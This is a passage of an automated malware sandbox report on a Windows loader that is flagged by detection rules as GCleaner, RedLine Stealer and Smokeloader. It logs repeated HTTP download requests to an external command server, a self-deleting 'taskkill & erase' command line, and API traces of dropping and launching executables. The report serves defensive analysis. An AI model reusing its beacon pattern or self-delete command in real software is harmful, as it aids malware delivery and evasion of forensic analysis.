GetStringTypeW, IsProcessorFeaturePresent

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2024 12:04:57.861475945 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:04:57.866358042 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:04:57.866465092 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:04:57.866602898 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:04:57.871360064 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:04:58.559222937 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:04:58.559341908 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:04:58.578448057 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:04:58.583333015 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:04:58.819294930 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:04:58.819417000 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:00.838357925 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:01.081393003 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:01.296654940 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:01.296717882 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:03.307447910 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:03.312418938 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:03.535039902 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:03.535092115 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:05.619745016 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:05.626123905 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:05.849441051 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:05.849520922 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:07.869872093 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:07.876579046 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:08.117543936 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:08.117644072 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:10.135840893 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:10.140665054 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:10.377706051 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:10.377784014 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:12.493171930 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:12.497973919 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:12.719479084 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:12.719585896 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:14.745620012 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:15.056560040 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:15.544934034 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:15.544943094 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:15.767347097 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:15.767431974 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:17.816349030 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:17.821341991 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:18.043237925 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:18.043323994 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:20.073167086 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:20.079392910 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:20.297216892 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:20.297288895 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:22.323281050 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:22.328246117 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:22.570949078 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:22.571201086 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:27.577004910 CEST	80	49730	80.66.75.114	192.168.2.4
Aug 28, 2024 12:05:27.578176022 CEST	49730	80	192.168.2.4	80.66.75.114
Aug 28, 2024 12:05:37.182760000 CEST	49730	80	192.168.2.4	80.66.75.114

HTTP Request Dependency Graph

80.66.75.114

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	80.66.75.114	80	5356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Aug 28, 2024 12:04:57.866602898 CEST	400	OUT	GET /add?substr=one&s=two HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:04:58.559222937 CEST	204	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:04:58 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:04:58.578448057 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:04:58.819294930 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:04:58 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:00.838357925 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:01.296654940 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:01 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:03.307447910 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:03.535039902 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:05.619745016 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:05.849441051 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:07.869872093 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:08.117543936 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:10.135840893 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:10.377706051 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:12.493171930 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:12.719479084 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:14.745620012 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:15.056560040 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:15.767347097 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:17.816349030 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:18.043237925 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:20.073167086 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:20.297216892 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Aug 28, 2024 12:05:22.323281050 CEST	394	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: B Host: 80.66.75.114 Connection: Keep-Alive Cache-Control: no-cache
Aug 28, 2024 12:05:22.570949078 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 10:05:22 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Target ID:	0
Start time:	06:04:52
Start date:	28/08/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	288'256 bytes
MD5 hash:	E0E8E64DFAD5B7DCAE0D8C569C3995A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GCleaner, Description: Yara detected GCleaner, Source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_GCleaner, Description: Yara detected GCleaner, Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_GCleaner, Description: Yara detected GCleaner, Source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:05:24
Start date:	28/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:05:24
Start date:	28/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:05:24
Start date:	28/08/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im "file.exe" /f
Imagebase:	0x780000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:05:24
Start date:	28/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1504
Imagebase:	0x6f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	14.9%
Total number of Nodes:	657
Total number of Limit Nodes:	12

Executed Functions

Function 004306A8 Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 243
librarymemorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 00430728
InterlockedExchange.KERNEL32(?,00000000), ref: 00430750
LocalSize.KERNEL32(00000000), ref: 00430757
FindAtomW.KERNEL32(00000000), ref: 0043075E
SearchPathA.KERNEL32(00432990,00432964,00432920,00000000,?,?), ref: 00430781
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00430789
GetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 004307AA
GetEnvironmentStringsW.KERNEL32 ref: 004307BA
WriteConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004307EB
GetNumaNodeProcessorMask.KERNEL32(00000000,00000000), ref: 004307F3
DebugActiveProcess.KERNEL32(00000000), ref: 004307FA
EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00430815
GetUserDefaultLangID.KERNEL32 ref: 0043081B
RtlLeaveCriticalSection.NTDLL(?), ref: 0043082F
LoadLibraryA.KERNEL32(00000000), ref: 00430844
GetLastError.KERNEL32 ref: 0043085E
GetSystemTimes.KERNELBASE(?,?,?), ref: 00430873
FoldStringA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0043089A
CallNamedPipeW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004308BF
GetComputerNameW.KERNEL32(00000000,00000000), ref: 004308C7
GetConsoleAliasExesLengthA.KERNEL32 ref: 004308CD
GlobalAlloc.KERNELBASE(00000000), ref: 00430901
GlobalFlags.KERNEL32(00000000), ref: 0043095A
SetStdHandle.KERNEL32(00000000,00000000), ref: 00430962
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0043096A
InterlockedIncrement.KERNEL32(?), ref: 0043098B

Strings

}$, xrefs: 00430992
k`, xrefs: 00430970

Memory Dump Source

Source File: 00000000.00000002.2073120364.000000000042F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0042F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_42f000_file.jbxd

Similarity

API ID: Console$DefaultGlobalInterlocked$ActiveAliasAllocAtomCallCommCommandComputerConfigCreateCriticalDateDebugDirectoryEnumEnvironmentErrorExchangeExesFindFlagsFoldFormatsHandleIncrementLangLastLeaveLengthLibraryLineLoadLocalMaskModeNameNamedNodeNumaOutputPathPipeProcessProcessorSearchSectionSizeStringStringsSystemTimesUserWrite
String ID: k`$}$
API String ID: 1182007909-956986773
Opcode ID: 8e8e1fa168d94af56ddab3af4480defc43935927ed82908c6cfd84a80c8ab4eb
Instruction ID: 252f18c5454386092dec256231b12afd835d1e7ecb948c24ff4ad793c05b1202
Opcode Fuzzy Hash: 8e8e1fa168d94af56ddab3af4480defc43935927ed82908c6cfd84a80c8ab4eb
Instruction Fuzzy Hash: 7181D5B1006250ABD325AB61ED4899F7BBCFF8D355F00253AF18582531CB389585CBAE

Function 004018E0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 298
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401965
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401984

Strings

text, xrefs: 00401BBC
o_, xrefs: 00401B8D

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID: text$o_
API String ID: 3197321146-3402754254
Opcode ID: 3c0d202cc575a3e81fa84d0cd9a7869eb666f88b8381f879e8e9a10e6c3609fa
Instruction ID: 95c3360cbeae16a3088dc5621d50489d8472184c4d2136748235245d26f4a208
Opcode Fuzzy Hash: 3c0d202cc575a3e81fa84d0cd9a7869eb666f88b8381f879e8e9a10e6c3609fa
Instruction Fuzzy Hash: 32C15A71A002189FEB25CF24CD85BEAB7B9FF48704F1041A9E409A7291DB79BE84CF54

Function 00404530 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 375
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 004046C9
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040488A

Strings

`a}{, xrefs: 00404673
P2@, xrefs: 00404880

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Init_thread_footerIos_base_dtorstd::ios_base::_
String ID: P2@$`a}{
API String ID: 3517786926-462742119
Opcode ID: 9fdd31378480dcf15e3af3e536f2f77430b3de8012b1440a9efbe30b936bb416
Instruction ID: 52e700e0cd732b109d2594068b40461c9d61cb6a59b344c7ecf86d07bab2a164
Opcode Fuzzy Hash: 9fdd31378480dcf15e3af3e536f2f77430b3de8012b1440a9efbe30b936bb416
Instruction Fuzzy Hash: 9BE1D4B1A002048FCB18DF68C985BAEB7B1FF89304F14816EE545A73D1D778AD84CB99

Function 0040C4F1 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0040C4F0,00000000,?,?,00000000,?,00410E60), ref: 0040C513
TerminateProcess.KERNEL32(00000000,?,0040C4F0,00000000,?,?,00000000,?,00410E60), ref: 0040C51A
ExitProcess.KERNEL32 ref: 0040C52C

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4074258ae3e92e5929474cff9357cd5b9568f201180147c8900c034a5ce98615
Instruction ID: 1490a54b17112977ad9bd0836ae6413dd7c273063893de81d35b0edf8b8fbaf1
Opcode Fuzzy Hash: 4074258ae3e92e5929474cff9357cd5b9568f201180147c8900c034a5ce98615
Instruction Fuzzy Hash: E0E04635400118FFCF116B24DC49A993F69EB48389F008029F80996271CB39EE82CA88

Function 007C51AE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007C51D6
Module32First.KERNEL32(00000000,00000224), ref: 007C51F6

Memory Dump Source

Source File: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, Offset: 007C4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c4000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 0d6e69f44c96fb8c49794f248a57d004d1d8e6478abd90ec6bdc7c93e807d3e9
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 5BF06231500B146BD7202AB5988DFAE77E8AF49724F14062CE656D14C0DAB5FC854A61

Function 00403640 Relevance: 32.4, APIs: 14, Strings: 4, Instructions: 947fileprocessCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,FFC4BD39,00000000,00000000), ref: 004036CA
CreateDirectoryA.KERNEL32(00000000,00000000,?,004278D4,00000001,00000000,00000001), ref: 00403893
GetLastError.KERNEL32(?,004278D4,00000001,00000000,00000001), ref: 004038A7
GetTempPathA.KERNEL32(00000104,?,?,004278D4,00000001,00000000,00000001), ref: 004038C0
CreateDirectoryA.KERNEL32(00000000,00000000,?,004278D4,00000001,00000000,00000000,00000001), ref: 00403A9E
GetLastError.KERNEL32(?,004278D4,00000001,00000000,00000000,00000001), ref: 00403AA8

Part of subcall function 0040C891: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004027D7,00000000,0040416A,FFC4BD39), ref: 0040C8A4
Part of subcall function 0040C891: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040C8D5

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,?,004278D4,00000001,?), ref: 00403EFA
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004278D4,00000001,?), ref: 00403F21
CloseHandle.KERNEL32(00000000,?,004278D4,00000001,?,?,?,?,?,?,?,?,?,?,74DEE010), ref: 00403F28
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000010,00000000,?,004278D4,00000001,?), ref: 00403F9B
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 00403FC4
CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,00000002), ref: 00404078

Strings

APPDATA, xrefs: 004036F3
.exe, xrefs: 00403D4F, 00403D63
open, xrefs: 00403FBD
TMPDIR, xrefs: 004038E6

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Create$File$DirectoryErrorLastPathTime$CloseExecuteFolderHandleProcessShellSystemTempUninitializeUnothrow_t@std@@@Write__ehfuncinfo$??2@
String ID: .exe$APPDATA$TMPDIR$open
API String ID: 2534051021-2655528187
Opcode ID: 4fec96006fcfa779c0c7d7bbf52e9e687933ec8eddf1ea85b4b64a61da3990a7
Instruction ID: 9feb7eaa063d4f88fc3074939199b67186b87428df755354eb6ba3568a1e8946
Opcode Fuzzy Hash: 4fec96006fcfa779c0c7d7bbf52e9e687933ec8eddf1ea85b4b64a61da3990a7
Instruction Fuzzy Hash: DE821571E002189BDB14DF24CC89BDDBB75AF45304F1042BAE509B72D2DB79AA84CF99

Function 004017A0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 103
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401817
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 0040183D

